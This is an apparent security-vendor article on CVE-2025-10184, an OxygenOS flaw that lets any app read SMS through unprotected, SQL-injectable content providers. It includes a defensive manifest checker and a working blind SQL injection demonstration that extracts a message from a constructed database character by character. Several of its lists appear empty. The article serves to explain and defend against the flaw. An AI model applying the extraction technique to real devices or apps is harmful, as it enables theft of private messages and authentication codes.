Smartphones are now the center of your digital life: they store messages, passwords, photos, banking data, and even work documents. That’s why when a critical vulnerability surfaces in an OS like OnePlus's OxygenOS, the risk is serious. And that’s exactly what has just come to light: a flaw that allows malicious apps to access your SMS without any special permissions or user consent.
At TecnetOne, we want you to understand what’s happening, how it could affect you, and the steps you can take to reduce your risk while waiting for an official fix.
The vulnerability, registered as CVE-2025-10184, affects multiple versions of OxygenOS (from version 12 to the latest, version 15 based on Android 15). It was discovered by researchers at Rapid7, a well-known cybersecurity firm, and as of now, OnePlus has not released a patch to fix the issue.
More concerning, despite Rapid7's attempts at coordinated disclosure, the company has not officially responded to the researchers. That is why Rapid7 went ahead and published full technical details, including a proof-of-concept (PoC) that shows how an attacker could exploit the flaw.
The flaw originates from OnePlus’s decision to modify Android’s standard telephony package to include additional content providers such as:
The problem is that these providers are exported to other apps without being guarded by the READ_SMS permission that protects the standard SMS provider. As a result, any app installed on the phone can query them, without holding any SMS permission and without the user ever being prompted.
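The misconfiguration above is visible in a package's manifest: a `<provider>` that is exported but declares no `android:readPermission` (and no catch-all `android:permission`) can be queried by every app on the device. The check below is an added example written for this article, not code from Rapid7 or OnePlus; the manifest it parses is constructed, and the authority names in it are placeholders rather than the real OxygenOS providers.

```python
import xml.etree.ElementTree as ET

# Attribute namespace used by every android:* attribute in a manifest.
ANDROID_NS = "http://schemas.android.com/apk/res/android"


def _android_attr(element, name):
    return element.get(f"{{{ANDROID_NS}}}{name}")


def find_readable_by_anyone(manifest_xml):
    """Return the authorities of exported <provider> elements whose read path
    is not guarded by any permission.

    android:readPermission wins for reads; android:permission covers both
    reads and writes; android:writePermission alone leaves reads open."""
    root = ET.fromstring(manifest_xml)
    unguarded = []
    for provider in root.iter("provider"):
        exported = (_android_attr(provider, "exported") or "false").lower() == "true"
        if not exported:
            continue  # unreachable from other apps, so not a cross-app issue
        read_guard = (_android_attr(provider, "readPermission")
                      or _android_attr(provider, "permission"))
        if read_guard is None:
            unguarded.append(_android_attr(provider, "authorities"))
    return unguarded


# Constructed manifest fragment with placeholder authorities; it is not the
# manifest of the affected OxygenOS package.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.telephony">
  <application>
    <!-- Guarded the way the stock SMS provider is: reads need READ_SMS. -->
    <provider android:name=".SmsProvider"
              android:authorities="sms"
              android:exported="true"
              android:readPermission="android.permission.READ_SMS"
              android:writePermission="android.permission.WRITE_SMS" />
    <!-- Only writes are guarded; any app can query it. -->
    <provider android:name=".ExtraMessageProvider"
              android:authorities="com.example.extra.messages"
              android:exported="true"
              android:writePermission="android.permission.WRITE_SMS" />
    <!-- Not exported, so unreachable from other apps regardless. -->
    <provider android:name=".InternalProvider"
              android:authorities="com.example.internal"
              android:exported="false" />
  </application>
</manifest>
"""

if __name__ == "__main__":
    for authority in find_readable_by_anyone(SAMPLE_MANIFEST):
        print(f"exported provider readable without any permission: {authority}")
```

Two caveats when running this against a real APK's decoded manifest: a provider with no `android:exported` attribute defaults to exported on packages targeting API 16 or lower, so treat a missing attribute as a finding on old targets, and a `readPermission` that points at a custom permission with `protectionLevel="normal"` is granted to any app that asks for it, so check the declared protection level as well.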
To make things worse, Rapid7 found that the input a calling app supplies to these providers is not sanitized, which opens them to blind SQL injection. In a blind injection the attacker never sees the sms table directly; instead, each crafted query answers a yes-or-no question about it, and by asking enough of those questions an attacker can reconstruct the content of your SMS messages one character at a time from the phone's database.
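To make the character-by-character inference concrete, here is an added example, written for this article and not Rapid7's PoC, that reproduces the bug class on a constructed SQLite database: a provider that splices a caller's selection straight into its SQL, a yes/no oracle built from whether any rows come back, and a binary search over message length and code points that recovers a message body from a table the caller was never supposed to read. The table names and message are made up, and the hardened variant uses a SQLite authorizer purely as a stand-in for the controls Android offers (a read permission on the provider plus `SQLiteQueryBuilder.setStrict(true)`); it is not the fix for any real device.

```python
import sqlite3

PROVIDER_TABLE = "extra"  # the table the weak provider is supposed to serve


def build_sample_db():
    """Constructed in-memory stand-in for a telephony database: the provider's
    own table sits next to the sms table, so a subquery can reach both."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE sms (_id INTEGER PRIMARY KEY, address TEXT, body TEXT);
        CREATE TABLE extra (_id INTEGER PRIMARY KEY, note TEXT);
        INSERT INTO sms VALUES (1, '+15550100', 'Your code is 482913');
        INSERT INTO extra VALUES (1, 'harmless');
    """)
    return conn


def vulnerable_query(conn, selection):
    """Splices the caller-supplied selection into SQL unchanged, which is the
    defect class the text describes."""
    return conn.execute(f"SELECT _id FROM {PROVIDER_TABLE} WHERE {selection}").fetchall()


def oracle(conn, condition):
    """Boolean oracle: the attacker only learns whether any row came back."""
    return len(vulnerable_query(conn, f"1=1 AND ({condition})")) > 0


def search_value(ask, lo, hi):
    """Find v in [lo, hi] given an oracle ask(n) that answers 'v > n'."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_body(conn, sms_id, max_len=160):
    """Reconstruct one message body character by character through the oracle
    (assumes ASCII; widen the code-point range for other scripts)."""
    body = f"(SELECT body FROM sms WHERE _id = {sms_id})"
    length = search_value(lambda n: oracle(conn, f"length({body}) > {n}"), 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        code = search_value(
            lambda n: oracle(conn, f"unicode(substr({body}, {pos}, 1)) > {n}"), 0, 127)
        chars.append(chr(code))
    return "".join(chars)


def hardened_query(selection):
    """Same query, but an authorizer refuses reads of any table other than the
    provider's own, so a selection that reaches into sms fails at compile time.
    Returns None when the statement is denied."""
    conn = build_sample_db()

    def authorizer(action, table, column, dbname, trigger):
        if action == sqlite3.SQLITE_READ and table != PROVIDER_TABLE:
            return sqlite3.SQLITE_DENY
        return sqlite3.SQLITE_OK

    conn.set_authorizer(authorizer)
    try:
        return conn.execute(f"SELECT _id FROM {PROVIDER_TABLE} WHERE {selection}").fetchall()
    except sqlite3.DatabaseError:  # SQLite reports "not authorized"
        return None


if __name__ == "__main__":
    print("recovered:", extract_body(build_sample_db(), 1))
    print("hardened, benign:", hardened_query("1=1"))
    print("hardened, subquery:", hardened_query("1=1 AND (SELECT body FROM sms) LIKE 'Y%'"))
```

The cost of the attack is what makes it practical: with binary search, each character costs about seven queries, so a 160-character message needs roughly a thousand provider queries, all of them silent to the user. The defensive point is the same on both sides of the example: no amount of input filtering substitutes for the permission check, because the selection is a SQL fragment by design; the provider must require `READ_SMS` (or not be exported at all) and constrain what the selection is allowed to reference.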
To successfully extract your SMS data, certain conditions must be met:
If those conditions are met, attackers can gradually extract:
Researchers confirmed the exploit works on the OnePlus 8T and OnePlus 10 Pro; those are simply the devices they tested, not an exhaustive list of affected models.
Since the flaw affects a core system component, any device running OxygenOS 12, 13, 14, or 15 is likely at risk. This is not hardware-dependent—it’s a software issue.
Extra providers OnePlus added on its Telephony package (Source: Rapid7)
If you use an affected OnePlus device, any malicious app could:
This kind of vulnerability creates real risk for identity theft, financial fraud, and unauthorized access to critical services.
The most alarming part isn’t just the vulnerability—it’s OnePlus’s lack of response. As of now, there has been no official communication or patch release.
This leaves users vulnerable and dependent on the vendor to act quickly, while the threat remains real and present.
PoC exploit to infer SMS content (Source: Rapid7)
Until OnePlus releases a fix, here are some mitigation steps to reduce your exposure:
At TecnetOne, we see this vulnerability as a powerful reminder of how fragile device security becomes when manufacturers alter critical Android components without reinforcing proper controls.
It also underscores the fact that SMS is no longer a secure channel for authentication—many experts now recommend moving to app-based MFA or hardware security keys.
CVE-2025-10184 in OxygenOS is a stark reminder that cybersecurity must be central to your digital strategy. While it specifically impacts OnePlus users, its implications stretch far beyond, as SMS is still widely used for critical processes in banking, social platforms, and enterprise apps.
While waiting for a patch from OnePlus, your best defense is proactive action: install trusted apps, limit SMS-based authentication, and stay vigilant with your accounts.
At TecnetOne, we believe that strong cybersecurity starts with awareness and early action. And this case is a perfect example of why you can never let your guard down in the digital world.